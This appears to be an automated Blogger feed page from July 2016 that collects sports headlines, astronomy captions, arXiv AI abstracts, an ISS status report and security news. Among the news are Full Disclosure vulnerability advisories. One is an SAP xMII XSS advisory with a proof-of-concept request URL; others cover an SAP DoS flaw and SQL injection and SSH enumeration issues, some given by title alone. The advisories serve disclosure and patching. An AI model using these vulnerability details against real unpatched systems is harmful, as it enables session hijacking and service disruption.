Latest YouTube Video

Saturday, July 16, 2016

Orioles Video: J.J. Hardy powers the offense with a 2-run homer down the left field line in 2-1 win over the Rays (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous-Sensei

Hello there, my name is ______. I prefer not to share it for now! Yes, I am a girl. Anyways, check out my welcome project to see more about this

from Google Alert - anonymous http://ift.tt/2a1QCrf
via IFTTT

Here's How Riffle Anonymity Network Protects Your Privacy better than Tor

Online privacy is an Internet buzzword nowadays. If you are also concerned about the privacy of your web surfing, the most efficient way is to use TOR – a free software that lets users communicate anonymously by hiding their actual location from snoopers. Although TOR is a great anonymous network, it has some limitations that could still allow a motivated hacker to compromise the anonymity of


from The Hacker News http://ift.tt/29JIitF
via IFTTT

How to Stay Anonymous Online

New technology developed by researchers at the Massachusetts Institute of Technology Computer Science and Artificial Intelligence Laboratory and ...

from Google Alert - anonymous http://ift.tt/2ahFJRo
via IFTTT

NGC 2736: The Pencil Nebula


Moving from top to bottom in the frame near the center of this sharply detailed color composite, thin, bright, braided filaments are actually long ripples in a cosmic sheet of glowing gas seen almost edge-on. The shock wave plows through interstellar space at over 500,000 kilometers per hour. Cataloged as NGC 2736, its elongated appearance suggests its popular name, the Pencil Nebula. The Pencil Nebula is about 5 light-years long and 800 light-years away, but represents only a small part of the Vela supernova remnant. The Vela remnant itself is around 100 light-years in diameter, the expanding debris cloud of a star that was seen to explode about 11,000 years ago. Initially, the shock wave was moving at millions of kilometers per hour but has slowed considerably, sweeping up surrounding interstellar material. In the narrowband, wide field image, red and blue-green colors track the characteristic glow of ionized hydrogen and oxygen atoms. via NASA http://ift.tt/29TYjBd

Friday, July 15, 2016

Orioles Video: Jonathan Schoop takes Chris Archer deep for a solo homer to break open a tie game in 4-3 win vs. Rays (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Q&A with Nightline Volunteer (Anonymous)

Q&A with Nightline Volunteer (Anonymous). 15 July 2016. inspire-me-img. We posted an article earlier this week kindly provided for us by London ...

from Google Alert - anonymous http://ift.tt/29E4hCn
via IFTTT

Ravens, K Justin Tucker agree to 4-year, $16.8M deal that includes $10.8M guaranteed (most ever for a kicker) - Schefter (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ubuntu Linux Forum Hacked! Once Again

No software is immune to being Hacked! Not even Linux. The Ubuntu online forums have been hacked, and data belonging to over 2 Million users have been compromised, Canonical just announced. The compromised users’ data include their IP addresses, usernames, and email addresses, according to the company, who failed to apply a patch to secure its users' data. <!-- adsense --> However, users


from The Hacker News http://ift.tt/29UGFNO
via IFTTT

[FD] x-originating-ip: [25.162.68.132]

Would be interesting to know why my 'x-originating-ip' is [25.162.68.132] while using Office 365 OWA... Especially when it belongs to UK Ministry of Defence. http://ift.tt/29OOSm3 I hope that FD don't filter and remove my 'x-originating-ip' now... otherwise i think you would be able to see it.. Snip from my own test e-mails to external mail address. - Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: authentication-results: spf=none (sender IP is ) smtp.mailfrom=mcw@noemail.eu; x-ms-exchange-messagesentrepresentingtype: 1 x-originating-ip: [25.162.68.132] x-ms-office365-filtering-correlation-id: 498c2369-4d7c-416b-1b77-08d3ac186731 - /bashis

Source: Gmail -> IFTTT-> Blogger

[FD] opensshd - user enumeration

Sorry for the resend, I change the format of the email to better fit the list...

Source: Gmail -> IFTTT-> Blogger

[FD] Blind SQL Injection PivotX <= v2.3.11

============================================= MGC ALERT 2016-003 - Original release date: April 14, 2016 - Last revised: July 14, 2016 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) ============================================= I. VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

Re: [FD] RCE by abusing NAC to gain Domain Persistence.

[FD] missing input validation in pmount: arbitrary mount as non-root

Summary:

Source: Gmail -> IFTTT-> Blogger

Re: [FD] RCE by abusing NAC to gain Domain Persistence.

Anonymous Already Pursuing Justice for Nice Attack

Only hours after the attack, Anonymous took to the web to launch #OpNice vowing to "track down" members of the terrorist group responsible.

from Google Alert - anonymous http://ift.tt/29UAM3d
via IFTTT

[FD] [ERPSCAN-16-021] SAP xMII - Reflected XSS vulnerability

Application: SAP xMII Versions Affected: SAP xMII 15 Vendor URL: http://SAP.com Bugs: XSS Sent: 04.12.2015 Reported: 05.12.2015 Vendor response: 05.12.2015 Date of Public Advisory: 12.04.2016 Reference: SAP Security Note 2201295 Author: Nursultan Abubakirov (ERPScan) , Vahagn Vardanyan (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP xMII – Reflected XSS vulnerability Advisory ID: [ERPSCAN-16-021] Risk: medium Advisory URL: http://ift.tt/1S9JuJU Date published: 12.04.2016 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: Cross-site scripting Impact: steal user's cookies, modify web page content Remotely Exploitable: Yes Locally Exploitable: No CVE: CVE-2016-4016 CVSS Information CVSS Base Score v3: 6.1 / 10 CVSS Base Vector: AV : Attack Vector (Related exploit range) Network (N) AC : Attack Complexity (Required attack complexity) Low (L) PR : Privileges Required (Level of privileges needed to exploit) None (N) UI : User Interaction (Required user participation) Required (R) S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed (C) C : Impact to Confidentiality Low (L) I : Impact to Integrity Low (L) A : Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION Anonymous attacker can use a special HTTP request to hijack session data of administrators or users of a web resource. 4. VULNERABLE PACKAGES SAP xMII 15 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2201295 6. AUTHOR Nursultan Abubakirov (ERPScan), Vahagn Vardanyan (ERPScan) 7. TECHNICAL DESCRIPTION Proof of Concept http://SAP_URL:SAP_PORT/webdynpro/resources/sap.com/xapps~xmii~ui~admin~navigation/NavigationApplication?view=com.sap.itsam.cfg.mii.admin.KPIMonitor&deployable=sap.com/xapps~xmii~ui~admin~alert&component=com.sap.xapps.xmii.ui.admin.rootcomponent.RootComponent&title=# 8. REPORT TIMELINE Sent: 04.12.2015 Reported: 05.12.2015 Vendor response: 05.12.2015 Date of Public Advisory: 12.04.2016 9. REFERENCES http://ift.tt/1S9JuJU http://ift.tt/29AKJPe 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is the most respected and credible Business Application Security provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial and Retail organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security, and provide solutions to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both, cyber-attacks as well as internal fraud. Usually our clients are large enterprises, Fortune 2000 companies and managed service providers whose requirements are to actively monitor and manage security of vast SAP landscapes on a global scale. We ‘follow the sun’ and function in two hubs, located in the Palo Alto and Amsterdam to provide threat intelligence services, agile support and operate local offices and partner network spanning 20+ countries around the globe. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-16-020] SAP NetWeaver AS JAVA UDDI component - XXE vulnerability

[FD] [ERPSCAN-16-019] SAP NetWeaver Enqueue Server - DoS vulnerability

Application: SAP NetWeaver Enqueue Server Versions Affected: SAP NetWeaver Enqueue Server 7.4 Vendor URL: http://SAP.com Bug: denial of service Sent: 04.12.2015 Reported: 05.12.2015 Vendor response: 05.12.2015 Date of Public Advisory: 12.04.2016 Reference: SAP Security Note 2258784 Author: Vahagn Vardanyan (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP NetWeaver Enqueue Server – DoS vulnerability Advisory ID: [ERPSCAN-16-019] Risk: high Advisory URL: http://ift.tt/1S9Jx8t Date published: 12.04.2016 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: denial of service Impact: denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE: CVE-2016-4015 CVSS Information CVSS Base Score v3: 7.5 / 10 CVSS Base Vector: AV : Attack Vector (Related exploit range) Network (N) AC : Attack Complexity (Required attack complexity) Low (L) PR : Privileges Required (Level of privileges needed to exploit) None (N) UI : User Interaction (Required user participation) None (N) S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U) C : Impact to Confidentiality None (N) I : Impact to Integrity None (N) A : Impact to Availability High (H) 3. VULNERABILITY DESCRIPTION Anonymous attacker can use a special request to cause a denial of service in SAP Enqueue 4. VULNERABLE PACKAGES SAP NetWeaver Enqueue Server 7.4 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2258784 6. AUTHOR Vahagn Vardanyan (ERPScan) 7. TECHNICAL DESCRIPTION Enqueue Server allows an anonymous attacker to prevent legitimate users from accessing the service, either by crashing or flooding it. 8. REPORT TIMELINE Sent: 04.12.2015 Vendor response: 05.12.2015 Date of Public Advisory: 12.04.2016 9. REFERENCES http://ift.tt/1S9Jx8t http://ift.tt/29AKe8a 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is the most respected and credible Business Application Security provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial and Retail organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security, and provide solutions to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both, cyber-attacks as well as internal fraud. Usually our clients are large enterprises, Fortune 2000 companies and managed service providers whose requirements are to actively monitor and manage security of vast SAP landscapes on a global scale. We ‘follow the sun’ and function in two hubs, located in the Palo Alto and Amsterdam to provide threat intelligence services, agile support and operate local offices and partner network spanning 20+ countries around the globe. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

Can't get intellisense to link params for anonymous functions

Can't get intellisense to link params for anonymous functions #9755. Open. egamma opened this Issue 20 minutes ago · 2 comments ...

from Google Alert - anonymous http://ift.tt/29UXrLi
via IFTTT

Microsoft Wins! Govt Can't Force Tech Companies to Hand Over Data Stored Overseas

Especially after the Snowden revelations of global mass surveillance by US intelligence agencies at home and abroad, various countries demanded tech companies including Google, Apple, and Microsoft to set-up and maintain their servers in respective countries in order to keep their citizen data within boundaries. The US government has powers to comply US-based tech companies with the court


from The Hacker News http://ift.tt/29NLKqK
via IFTTT

NGC 1309: Spiral Galaxy and Friends


A gorgeous spiral galaxy some 100 million light-years distant, NGC 1309 lies on the banks of the constellation of the River (Eridanus). NGC 1309 spans about 30,000 light-years, making it about one third the size of our larger Milky Way galaxy. Bluish clusters of young stars and dust lanes are seen to trace out NGC 1309's spiral arms as they wind around an older yellowish star population at its core. Not just another pretty face-on spiral galaxy, observations of NGC 1309's recent supernova and Cepheid variable stars contribute to the calibration of the expansion of the Universe. Still, after you get over this beautiful galaxy's grand design, check out the array of more distant background galaxies also recorded in this sharp, reprocessed, Hubble Space Telescope view. via NASA http://ift.tt/29z7Evd

Thursday, July 14, 2016

Resource Planning For Rescue Operations. (arXiv:1607.03979v1 [cs.AI])

After an earthquake, disaster sites pose a multitude of health and safety concerns. A rescue operation of people trapped in the ruins after an earthquake disaster requires a series of intelligent behavior, including planning. For a successful rescue operation, given a limited number of available actions and regulations, the role of planning in rescue operations is crucial. Fortunately, recent developments in automated planning by artificial intelligence community can help different organization in this crucial task. Due to the number of rules and regulations, we believe that a rule based system for planning can be helpful for this specific planning problem. In this research work, we use logic rules to represent rescue and related regular regulations, together with a logic based planner to solve this complicated problem. Although this research is still in the prototyping and modeling stage, it clearly shows that rule based languages can be a good infrastructure for this computational task. The results of this research can be used by different organizations, such as Iranian Red Crescent Society and International Institute of Seismology and Earthquake Engineering (IISEE).



from cs.AI updates on arXiv.org http://ift.tt/29GaayD
via IFTTT

Using Recurrent Neural Network for Learning Expressive Ontologies. (arXiv:1607.04110v1 [cs.CL])

Recently, Neural Networks have been proven extremely effective in many natural language processing tasks such as sentiment analysis, question answering, or machine translation. Aiming to exploit such advantages in the Ontology Learning process, in this technical report we present a detailed description of a Recurrent Neural Network based system to be used to pursue such goal.



from cs.AI updates on arXiv.org http://ift.tt/29TQw56
via IFTTT

Multi-modal dictionary learning for image separation with application in art investigation. (arXiv:1607.04147v1 [cs.CV])

In support of art investigation, we propose a new source separation method that unmixes a single X-ray scan acquired from double-sided paintings. In this problem, the X-ray signals to be separated have similar morphological characteristics, which brings previous source separation methods to their limits. Our solution is to use photographs taken from the front and back-side of the panel to drive the separation process. The crux of our approach relies on the coupling of the two imaging modalities (photographs and X-rays) using a novel coupled dictionary learning framework able to capture both common and disparate features across the modalities using parsimonious representations; the common component models features shared by the multi-modal images, whereas the innovation component captures modality-specific information. As such, our model enables the formulation of appropriately regularized convex optimization procedures that lead to the accurate separation of the X-rays. Our dictionary learning framework can be tailored both to a single- and a multi-scale framework, with the latter leading to a significant performance improvement. Moreover, to improve further on the visual quality of the separated images, we propose to train coupled dictionaries that ignore certain parts of the painting corresponding to craquelure. Experimentation on synthetic and real data - taken from digital acquisition of the Ghent Altarpiece (1432) - confirms the superiority of our method against the state-of-the-art morphological component analysis technique that uses either fixed or trained dictionaries to perform image separation.



from cs.AI updates on arXiv.org http://ift.tt/29Ih6yE
via IFTTT

Large-scale Analysis of Chess Games with Chess Engines: A Preliminary Report. (arXiv:1607.04186v1 [cs.AI])

The strength of chess engines together with the availability of numerous chess games have attracted the attention of chess players, data scientists, and researchers during the last decades. State-of-the-art engines now provide an authoritative judgement that can be used in many applications like cheating detection, intrinsic ratings computation, skill assessment, or the study of human decision-making. A key issue for the research community is to gather a large dataset of chess games together with the judgement of chess engines. Unfortunately the analysis of each move takes lots of times. In this paper, we report our effort to analyse almost 5 millions chess games with a computing grid. During summer 2015, we processed 270 millions unique played positions using the Stockfish engine with a quite high depth (20). We populated a database of 1+ tera-octets of chess evaluations, representing an estimated time of 50 years of computation on a single machine. Our effort is a first step towards the replication of research results, the supply of open data and procedures for exploring new directions, and the investigation of software engineering/scalability issues when computing billions of moves.



from cs.AI updates on arXiv.org http://ift.tt/29UjmFz
via IFTTT

Managing Overstaying Electric Vehicles in Park-and-Charge Facilities. (arXiv:1604.05471v2 [cs.AI] UPDATED)

With the increase in adoption of Electric Vehicles (EVs), proper utilization of the charging infrastructure is an emerging challenge for service providers. Overstaying of an EV after a charging event is a key contributor to low utilization. Since overstaying is easily detectable by monitoring the power drawn from the charger, managing this problem primarily involves designing an appropriate "penalty" during the overstaying period. Higher penalties do discourage overstaying; however, due to uncertainty in parking duration, less people would find such penalties acceptable, leading to decreased utilization (and revenue). To analyze this central trade-off, we develop a novel framework that integrates models for realistic user behavior into queueing dynamics to locate the optimal penalty from the points of view of utilization and revenue, for different values of the external charging demand. Next, when the model parameters are unknown, we show how an online learning algorithm, such as UCB, can be adapted to learn the optimal penalty. Our experimental validation, based on charging data from London, shows that an appropriate penalty can increase both utilization and revenue while significantly reducing overstaying.



from cs.AI updates on arXiv.org http://ift.tt/1QlwX0e
via IFTTT

Ravens: Franchise K Justin Tucker vowing not to re-sign if long-term deal not done by Friday, agent tells Adam Schefter (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Completion will not show doc comments for symbols containing anonymous types in them.

Completion will not show doc comments for symbols containing anonymous types in them. #12530. Open. CyrusNajmabadi opened this Issue 35 ...

from Google Alert - anonymous http://ift.tt/29BPGr7
via IFTTT

I have a new follower on Twitter


mjbasgall
Information Systems Engineer - PhD student in Computer Science - CONICET - UNLP - #BigData #MachineLearning and other things
Buenos Aires, Argentina
https://t.co/NTiNqveWRR
Following: 176 - Followers: 25

July 14, 2016 at 04:39PM via Twitter http://twitter.com/mjbasgall

I'm Warning You, Don't Read this Article. It's a Federal Crime!

Yes, you heard it right. If I tell you not to visit my website, but you still visit it knowing you are disapproved, you are committing a federal crime, and I have the authority to sue you. Wait! I haven't disapproved you yet. Rather I'm making you aware of a new court decision that may trouble you and could have big implications going forward. The United States Court of Appeals for the Ninth


from The Hacker News http://ift.tt/29St6A9
via IFTTT

Anonymous complaints can be examined if charge is serious: CVC

New Delhi, Jul 14 (PTI) Central Vigilance Commissioner (CVC) K V Chowdary today said even anonymous complaints can be verified by it if ...

from Google Alert - anonymous http://ift.tt/29z6mQL
via IFTTT

ISS Daily Summary Report – 07/13/16

Radiation Dosimetry Inside ISS-Neutron (RaDI-N) Retrieval: A USOS crewmember retrieved all 8 of the Space Bubble Detectors that were deployed last week around the ISS for the Radi-N experiment and handed them over to the Russian crewmember to be processed in the Bubble Reader. The Canadian Space Agency (CSA) RaDI-N investigation measures neutron radiation levels while onboard the ISS. RaDI-N uses bubble detectors as neutron monitors which have been designed to only detect neutrons and ignore all other radiation. 3D Printer Removal: Following two weeks of successful 3D printer operations, the crew disassembled the 3D Printer in the Microgravity Science Glovebox (MSG) and stowed the hardware. A total of 34 coupons were printed including calibration, tensile, compression, and layer specimen coupons. The 3D Printing In Zero-G experiment demonstrates that a 3D printer works normally in space. A 3D printer extrudes streams of heated plastic, metal or other material, building layer on top of layer to create three dimensional objects. Testing a 3D printer using relatively low-temperature plastic feedstock on the ISS is the first step toward establishing an on-demand machine shop in space, a critical enabling component for deep-space crewed missions and in-space manufacturing. Space Headaches: The crew completed the final daily European Space Agency (ESA) Space Headaches questionnaire for this week. The Space Headaches questionnaire provides information that may help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crew members in space. Headaches during space flight can negatively affect mental and physical capacities of crewmembers which can influence performance during a space mission.  Dose Tracker: The crew completed entries for medication tracking. This investigation documents the medication usage of crewmembers before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data is expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) is occurring during missions. Dragon On-Board Training (OBT) and Preparation: In preparation for SpX-9 arrival planned for July 20, the USOS crew practiced a 30 meter approach, two Capture Point hold runs and two meter runs. They also installed the Crew Command Panel (CCP) and activated the Commercial Orbital Transportation Services (COTS) Ultra High Frequency (UHF) Communication Unit (CUCU).  Today’s Planned Activities All activities were completed unless otherwise noted. EarthKAM Experiment in SM  Battery Changeout SM ПСС (Caution & Warning Panel) Test / Manual Controls RSS 1, 2 Reboot / r/g 1460 CORRECTSIYA. Logging Liquid and Food (Medication) Intake / r/g 2769 EHS MCD – In-flight Microbiology Water analysis and data recording Counter Measure System (CMS) Harmful Contaminant Measurements in SM / r/g 2782 ISS Crew/SSIPC (Space Station Integration And Promotion Center) Conference CARDIOVECTOR. Experiment Ops r/g 2777 ARED Cylinder Flywheel Evacuation ECLSS/TCS1 Rack Tilt Down ARED Flywheel Cylinder Evacuation СОЖ Maintenance ECLSS/TCS1 Rack Tilt Down (assistance) 3DP Hardware Stowage OTKLIK. Hardware Monitoring / r/g 1588 DAN. Experiment Operator Assistance / r/g 2780 DAN. Experiment Ops r/g 2780 Soyuz 731 Transfers and IMS Ops / r/g 2734 JPM Smoke Detector Cleaning  ECLSS/TCS1 Rack Tilt Up IDENTIFICATION. Copy ИМУ-Ц micro-accelerometer data to laptop / r/g 1589 ECLSS/TCS1 Rack Tilt Up (assistance) Crew time for ISS adaptation and orientation EarthKAM Experiment in SM  Camera lens swap DOSETRK Questionnaire Completion JPM Smoke Detector cleaning, Closeout Ops PAO Hardware Setup Crew Prep for PAO Filling MRM2 Thermal Mode Control System [СО1Р] compensator with coolant from SM [СОТР] КОБ2 compensator r/g 2771 PAO Event EarthKAM Experiment in SM Battery Changeout CORRECTSIYA. Logging Liquid and Food (Medication) Intake / r/g 2769 Soyuz 731 Transfers and IMS Ops / r/g 2734 OBT Dragon Rendezvous Procedures Review Crew OBT, Crew Medical Officer (CMO), Computer Based Training OBT Dragon Rendezvous Procedures Review SM [СОТР] КОБ1, КОБ2 Coolant Refill using refill set r/g 2771 MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements r/g 2781 Crew time for ISS adaptation and orientation CALCIUM. Experiment session 3 / r/g 2776 RADIN Retrieval of Radi-N detectors MATRYOSHKA-R. Handover of BUBBLE-dosimeter detectors from USOS r/g 2781 RADIN Handover of RADI-N Detectors to RS MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements r/g 2781 Crew time for ISS adaptation and orientation WRM Ops Placeholder IMS Update Photo/TV Camcorder Setup CUCU Activation HABIT Viewing Introduction Video HABIT Data Recording to iPad CUCU Check WRM Ops Placeholder CCP Stow for Crew Sleep SHD Weekly Questionnaire EarthKAM Experiment in SM Battery Changeout CORRECTSIYA. Logging Liquid and Food (Medicine) Intake / r/g 2769 Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. Dragon OBT support CUCU ops Nominal ground commanding. Three-Day Look Ahead: Thursday, 07/14: Emergency Book update, Dragon OBT, Heart Cells hardware setup, STRATA card changeout, EarthKAM ops Friday, 07/15: Emergency Roles & Responsibilities review, MSPR VRU SSD replace, Dragon OBT Offset Grapple/debrief conference, GLACIER2 dessicant pack swap Saturday, 07/16: 64P launch, crew off duty, housekeeping QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Norm Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/29G3a5T
via IFTTT

3 Popular Drupal Modules Found Vulnerable — Patch Released

Just yesterday, I wrote a warning article announcing that Drupal – the popular open source content management system – will release patches for several highly critical Remote Code Execution (RCE) bugs that could allow attackers to fully take over any affected site. Below are the three separate Drupal modules that affect up to 10,000 websites: 1. RESTful Web Services – a popular module used


from The Hacker News http://ift.tt/29FfR69
via IFTTT

What is Anonymous Call Rejection?

Anonymous Call Rejection blocks unwanted calls from callers who restrict sending caller ID information. Incoming calls with the caller ID restricted will ...

from Google Alert - anonymous http://ift.tt/29S8LLf
via IFTTT

DARPA Challenges Hackers to Create Automated Hacking System — WIN $2 Million

Why we can’t detect all security loopholes and patch them before hackers exploit them? Because... we know that humans are too slow at finding and fixing security bugs, which is why vulnerabilities like Heartbleed, POODLE and GHOST remained undetected for decades and rendered almost half of the Internet vulnerable to theft by the time patches were rolled out. Now to solve this hurdle, DARPA


from The Hacker News http://ift.tt/2a02wV4
via IFTTT

I have a new follower on Twitter


Gayle Nixon, MBA
Why fit in when you were born to stand out? ~Dr. Seuss | Strategic B2B Marketing Leader who loves to inspire others & drive revenue thru innovative campaigns!

https://t.co/Y6INRImUqw
Following: 8076 - Followers: 9494

July 14, 2016 at 12:55AM via Twitter http://twitter.com/GayleNixon_

M7: Open Star Cluster in Scorpius


M7 is one of the most prominent open clusters of stars on the sky. The cluster, dominated by bright blue stars, can be seen with the naked eye in a dark sky in the tail of the constellation of the Scorpion (Scorpius). M7 contains about 100 stars in total, is about 200 million years old, spans 25 light-years across, and lies about 1000 light-years away. The featured wide-angle image was taken near the city of Belo Horizonte in Brazil. The M7 star cluster has been known since ancient times, being noted by Ptolemy in the year 130 AD. Also visible are a dark dust cloud on the lower right, and, in the background, literally millions of unrelated stars towards the Galactic center. via NASA http://ift.tt/29BzBl2

Wednesday, July 13, 2016

I have a new follower on Twitter


David A. Chapa
David A. Chapa is a CTO with @elovatetech, and coworker at @conxspot. Tweets and comments are his own. oh, and he rides a Harley, thinks that makes him bad ass.
ÜT: 39.787929,-104.724543
https://t.co/1oIsMN17WB
Following: 2968 - Followers: 3852

July 13, 2016 at 11:27PM via Twitter http://twitter.com/davidchapa

Police Seek Anonymous Tipster in Cold Case

Kingston Police Major Crimes detectives are hopeful that an anonymous tipster will contact them again so they can collect more information in regards ...

from Google Alert - anonymous http://ift.tt/29F4IxX
via IFTTT

I have a new follower on Twitter


Metiora
Conecting things for smart decisions #iot #ioe. Instagram: @mymetiora Metiora an Unlimiteck Company https://t.co/yB8SndNnkm @myunlimiteck

https://t.co/P7z5EyDMJq
Following: 4033 - Followers: 4426

July 13, 2016 at 10:27PM via Twitter http://twitter.com/MyMetiora

Characterizing Driving Styles with Deep Learning. (arXiv:1607.03611v1 [cs.AI])

Characterizing driving styles of human drivers using vehicle sensor data, e.g., GPS, is an interesting research problem and an important real-world requirement from automotive industries. A good representation of driving features can be highly valuable for autonomous driving, auto insurance, and many other application scenarios. However, traditional methods mainly rely on handcrafted features, which limit machine learning algorithms to achieve a better performance. In this paper, we propose a novel deep learning solution to this problem, which could be the first attempt of studying deep learning for driving behavior analysis. The proposed approach can effectively extract high level and interpretable features describing complex driving patterns from GPS data. It also requires significantly less human experience and work. The power of the learned driving style representations are validated through the driver identification problem using a large real dataset.



from cs.AI updates on arXiv.org http://ift.tt/29FDj0h
via IFTTT

Possibilistic Networks: Parameters Learning from Imprecise Data and Evaluation strategy. (arXiv:1607.03705v1 [cs.AI])

There has been an ever-increasing interest in multidisciplinary research on representing and reasoning with imperfect data. Possibilistic networks present one of the powerful frameworks of interest for representing uncertain and imprecise information. This paper covers the problem of their parameters learning from imprecise datasets, i.e., containing multi-valued data. We propose in the rst part of this paper a possibilistic networks sampling process. In the second part, we propose a likelihood function which explores the link between random sets theory and possibility theory. This function is then deployed to parametrize possibilistic networks.



from cs.AI updates on arXiv.org http://ift.tt/2aaM4hu
via IFTTT

Computation of Stackelberg Equilibria of Finite Sequential Games. (arXiv:1507.07677v2 [cs.GT] UPDATED)

The Stackelberg equilibrium solution concept describes optimal strategies to commit to: Player 1 (termed the leader) publicly commits to a strategy and Player 2 (termed the follower) plays a best response to this strategy (ties are broken in favor of the leader). We study Stackelberg equilibria in finite sequential games (or extensive-form games) and provide new exact algorithms, approximate algorithms, and hardness results for several classes of these sequential games.



from cs.AI updates on arXiv.org http://ift.tt/1OAk03z
via IFTTT

Causal Discovery from Subsampled Time Series Data by Constraint Optimization. (arXiv:1602.07970v2 [cs.AI] UPDATED)

This paper focuses on causal structure estimation from time series data in which measurements are obtained at a coarser timescale than the causal timescale of the underlying system. Previous work has shown that such subsampling can lead to significant errors about the system's causal structure if not properly taken into account. In this paper, we first consider the search for the system timescale causal structures that correspond to a given measurement timescale structure. We provide a constraint satisfaction procedure whose computational performance is several orders of magnitude better than previous approaches. We then consider finite-sample data as input, and propose the first constraint optimization approach for recovering the system timescale causal structure. This algorithm optimally recovers from possible conflicts due to statistical errors. More generally, these advances allow for a robust and non-parametric estimation of system timescale causal structures from subsampled time series data.



from cs.AI updates on arXiv.org http://ift.tt/21vgteo
via IFTTT

The AGI Containment Problem. (arXiv:1604.00545v3 [cs.AI] UPDATED)

